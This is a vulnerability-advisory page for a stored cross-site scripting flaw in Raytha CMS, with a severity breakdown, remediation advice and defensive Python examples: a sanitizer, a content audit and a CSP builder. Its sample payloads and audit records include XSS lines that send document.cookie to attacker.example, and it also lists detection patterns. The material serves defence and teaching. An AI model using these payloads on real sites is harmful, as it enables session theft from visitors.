
Raytha EUVD-2025-208701 | CVE-2025-69237 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-03-16 CERT-PL
5.1 CVSS 4.0 · NVD

Severity by source

NVD PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from NVD · only source for this CVE.

CVSS Vector (NVD)

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
Attack Vector: Network
Attack Complexity: Low
Attack Requirements: None
Privileges Required: Low
User Interaction: Passive
Vulnerable System Confidentiality / Integrity / Availability: None / None / None
Subsequent System Confidentiality / Integrity / Availability: Low / Low / None

Lifecycle Timeline (4 events)

Patch available: Apr 16, 2026 05:29 (EUVD) - version 1.4.6
EUVD ID assigned: Mar 16, 2026 12:00 (EUVD) - EUVD-2025-208701
Analysis generated: Mar 16, 2026 12:00 (vuln.today)
CVE published: Mar 16, 2026 11:53 (NVD) - MEDIUM 5.1

Description (CVE.org)

Raytha CMS is vulnerable to Stored XSS via the FieldValues[0].Value parameter in the page creation functionality. An authenticated attacker with permissions to create content can inject arbitrary HTML and JS into the website, which will be rendered/executed when visiting the edited page.

This issue was fixed in version 1.4.6.

Analysis (AI)

Raytha CMS contains a stored cross-site scripting (XSS) vulnerability in the page creation functionality: the FieldValues[0].Value parameter is persisted without sanitization and later rendered without output encoding, so an authenticated user with content-creation permission can inject HTML and JavaScript that executes in the browser of anyone who views the affected page. The vulnerability affects Raytha CMS versions prior to 1.4.6. The NVD CVSS 4.0 score of 5.1 reflects that the vulnerable system itself is not directly affected (VC:N/VI:N/VA:N); the impact lands on the subsequent system, the viewing user's browser session (SC:L/SI:L), and exploitation requires low-privilege authentication (PR:L) and passive user interaction (UI:P, a victim merely visiting the page). While not currently listed in CISA's Known Exploited Vulnerabilities catalog, the low attack complexity and the availability of a vendor patch make this a moderate but manageable risk for deployed instances.

Technical Context (AI)

This vulnerability is an instance of stored XSS (CWE-79: Improper Neutralization of Input During Web Page Generation) in a content management system. Raytha CMS fails to sanitize or encode user-supplied input in the FieldValues[0].Value parameter during page creation (FieldValues[0].Value is the ASP.NET Core model-binding name for the Value property of the first element of a FieldValues collection), allowing arbitrary HTML and JavaScript to be persisted in the database and subsequently rendered without context-aware output encoding. The root cause is either missing sanitization at the point the field is stored or missing output encoding at the point the stored content is written into the page; for a CMS field that legitimately holds rich text, the correct fix is an allowlist HTML sanitizer, since blanket encoding would break intended markup. The vulnerability exists in Raytha CMS versions before 1.4.6; the advisory does not state an earliest affected version. Stored XSS is more dangerous than reflected XSS because the payload is persistent and fires for every user who views the compromised page, with no crafted link required; in a CMS the typical goal is to run script in the session of a higher-privileged user, such as an administrator who previews or reviews the page.
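The following is an added example, not Raytha's own code (Raytha is an ASP.NET Core application; this is a language-neutral model of the pattern in Python). It shows the three rendering paths discussed above for a value submitted in FieldValues[0].Value: raw concatenation (the CWE-79 bug), HTML-encoding on output (correct for plain-text fields, and what Razor's @ syntax does by default), and an allowlist sanitizer (correct for rich-text fields that must keep some markup). The payload, function names and allowlist are assumptions for illustration.

```python
"""Vulnerable vs hardened rendering of a stored CMS field value (added example)."""
import html
from html.parser import HTMLParser

# Constructed attacker input, as it could be submitted in the page-creation form
# field FieldValues[0].Value. This is illustrative, not a payload from the advisory.
PAYLOAD = (
    "<p>Welcome</p>"
    "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"
    "<script>alert(1)</script>"
    '<a href="javascript:alert(2)">link</a>'
)


def render_unsafe(value: str) -> str:
    """Vulnerable: the stored value is concatenated into the page unchanged."""
    return f"<article>{value}</article>"


def render_encoded(value: str) -> str:
    """Safe for plain-text fields: encode on output so markup becomes literal text."""
    return f"<article>{html.escape(value, quote=True)}</article>"


class AllowlistSanitizer(HTMLParser):
    """Safe for rich-text fields: keep only allowlisted tags and attributes.

    Unknown tags are dropped but their text is kept; script/style bodies are
    dropped entirely; href is kept only for http(s), same-origin paths and anchors.
    """

    ALLOWED_TAGS = {"p", "br", "b", "i", "strong", "em", "ul", "ol", "li", "a", "h1", "h2", "h3"}
    ALLOWED_ATTRS = {"a": {"href"}}
    VOID_TAGS = {"br"}
    DROP_CONTENT = {"script", "style"}

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self._skip = 0  # >0 while inside a script/style element

    @staticmethod
    def _safe_href(url: str) -> bool:
        # Allowlist of schemes; anything else (javascript:, data:, vbscript:) is refused.
        u = url.strip().lower()
        if u.startswith(("http://", "https://", "#")):
            return True
        return u.startswith("/") and not u.startswith("//")

    def handle_starttag(self, tag, attrs):
        if tag in self.DROP_CONTENT:
            self._skip += 1
            return
        if tag not in self.ALLOWED_TAGS:
            return  # drop the tag itself; its text content still flows through handle_data
        kept = []
        for name, value in attrs:
            if name in self.ALLOWED_ATTRS.get(tag, set()) and value is not None:
                if name == "href" and not self._safe_href(value):
                    continue
                kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in self.DROP_CONTENT:
            self._skip = max(0, self._skip - 1)
            return
        if tag in self.ALLOWED_TAGS and tag not in self.VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            # Text is re-encoded on the way out, so "&lt;" in input stays literal.
            self.out.append(html.escape(data, quote=False))


def sanitize(value: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(value)
    parser.close()
    return "".join(parser.out)


def render_sanitized(value: str) -> str:
    """Safe for rich-text fields: allowlisted markup survives, active content does not."""
    return f"<article>{sanitize(value)}</article>"


if __name__ == "__main__":
    for name, fn in (("unsafe", render_unsafe), ("encoded", render_encoded), ("sanitized", render_sanitized)):
        print(f"{name:>9}: {fn(PAYLOAD)}")
```

The sanitized output keeps the paragraph and the link text but drops the img element with its event handler, the script element including its body, and the javascript: href; the encoded output keeps everything as inert text. Which of the two is correct depends on whether the field is meant to carry HTML at all.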

Remediation (AI)

Upgrade Raytha CMS to version 1.4.6 or later, which contains the fix for this stored XSS vulnerability; follow the vendor's documented backup and migration procedure first. Where patching cannot happen immediately, apply compensating controls: restrict page-creation and page-editing permissions to a minimal set of trusted accounts; deploy a Content-Security-Policy header whose script-src does not include 'unsafe-inline' (nonce- or hash-based), which stops injected <script> blocks, inline event handlers and javascript: URLs from executing even though the HTML injection itself still occurs; and enable auditing of content modifications so that injected markup can be detected and attributed to an account. Additionally, review already-published pages for injected markup, since the flaw may have been exploited before the patch was applied, and consider an approval workflow so that a second person reviews new or modified pages before they become publicly visible.
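As an added example (not Raytha code), the two compensating controls above in runnable form: a content-change audit that flags stored field values carrying active markup, and a nonce-based Content-Security-Policy builder. The audit-record layout, the indicator patterns and the sample records are constructed assumptions; a real deployment would feed this from the CMS's own change log or database.

```python
"""Compensating controls for a pending stored-XSS patch (added example)."""
import re
import secrets

# Constructed audit records in the shape a CMS content-change log might emit.
SAMPLE_RECORDS = [
    {"id": 101, "user": "editor1", "action": "page.create",
     "field": "FieldValues[0].Value", "value": "<p>Quarterly update</p>"},
    {"id": 102, "user": "editor2", "action": "page.create",
     "field": "FieldValues[0].Value",
     "value": "<p>Hi</p><img src=x onerror=\"document.location='https://attacker.example/?'+document.cookie\">"},
    {"id": 103, "user": "editor2", "action": "page.update",
     "field": "FieldValues[1].Value", "value": '<a href="JavaScript:alert(1)">offer</a>'},
    {"id": 104, "user": "editor3", "action": "page.update",
     "field": "FieldValues[0].Value",
     "value": '<p>See <a href="/about">about</a></p><script>track()</script>'},
]

# Indicators of active content inside stored HTML. These are review triggers,
# not a sanitizer: a bypass here only means a finding is missed, not that a
# payload runs, because the CSP below is the control that blocks execution.
RISK_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"<[^>]*\son[a-z]+\s*=", re.I),
    "javascript_uri": re.compile(r"(href|src|action)\s*=\s*[\"']?\s*javascript\s*:", re.I),
    "embedded_frame_or_object": re.compile(r"<\s*(iframe|object|embed|svg)\b", re.I),
}


def audit_content_changes(records):
    """Return one finding per (record, indicator) hit, attributed to the acting account."""
    findings = []
    for rec in records:
        for indicator, pattern in RISK_PATTERNS.items():
            if pattern.search(rec["value"]):
                findings.append({
                    "record_id": rec["id"],
                    "user": rec["user"],
                    "action": rec["action"],
                    "field": rec["field"],
                    "indicator": indicator,
                })
    return findings


def new_nonce() -> str:
    """Fresh per-response nonce; it must change on every page render."""
    return secrets.token_urlsafe(16)


def build_csp(nonce: str) -> str:
    """Policy that executes only nonce-tagged scripts.

    Because script-src carries no 'unsafe-inline', injected <script> blocks,
    inline on* handlers and javascript: URLs are all refused by the browser.
    """
    return (
        "default-src 'self'; "
        f"script-src 'nonce-{nonce}' 'strict-dynamic'; "
        "object-src 'none'; "
        "base-uri 'self'; "
        "frame-ancestors 'self'"
    )


if __name__ == "__main__":
    for finding in audit_content_changes(SAMPLE_RECORDS):
        print(f"record {finding['record_id']} by {finding['user']} "
              f"({finding['action']}, {finding['field']}): {finding['indicator']}")
    print("Content-Security-Policy:", build_csp(new_nonce()))
```

The site's own legitimate scripts must carry the nonce attribute for this policy to work, so roll it out in Content-Security-Policy-Report-Only first and watch the reports before enforcing. The audit is a detection aid for attributing and cleaning up injected content; it does not replace the upgrade.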

More in Raytha

CVE-2026-12076 CRITICAL
9.3 Jun 30

SQL injection in Raytha CMS 1.5.2 lets a remote, unauthenticated attacker inject arbitrary SQL through the OData filter

CVE-2025-15540 HIGH
8.8 Mar 16

A code injection vulnerability in Raytha CMS's Functions module allows privileged users to execute arbitrary .NET operat

CVE-2025-69240 HIGH
7.5 Mar 16

A host header injection vulnerability in Raytha CMS allows attackers to hijack password reset tokens by spoofing X-Forwa

CVE-2025-69243 MEDIUM
6.9 Mar 16

Raytha CMS contains a user enumeration vulnerability in its password reset functionality where differing error messages

CVE-2025-69246 MEDIUM
6.9 Mar 16

Raytha CMS lacks brute force protection mechanisms, allowing attackers to conduct unlimited automated login attempts wit

CVE-2025-69238 MEDIUM
6.9 Mar 16

Raytha CMS contains a Cross-Site Request Forgery (CSRF) vulnerability across multiple endpoints that fails to enforce to

CVE-2025-69241 MEDIUM
5.3 Mar 16

Raytha CMS contains a Stored Cross-Site Scripting (XSS) vulnerability in the profile editing functionality, specifically

CVE-2025-69245 MEDIUM
5.1 Mar 16

Raytha CMS contains a Reflected Cross-Site Scripting (XSS) vulnerability in the logon functionality's returnUrl paramete

CVE-2025-69242 MEDIUM
5.1 Mar 16

Raytha CMS contains a reflected cross-site scripting (XSS) vulnerability in the backToListUrl parameter that allows unau

CVE-2025-69236 MEDIUM
5.1 Mar 16

Raytha CMS contains a Stored Cross-Site Scripting (XSS) vulnerability in the post editing functionality, specifically wi

CVE-2025-69239 MEDIUM
5.1 Mar 16

Raytha CMS contains a Server-Side Request Forgery (SSRF) vulnerability in its Theme Import from URL feature that allows


EUVD-2025-208701 vulnerability details – vuln.today
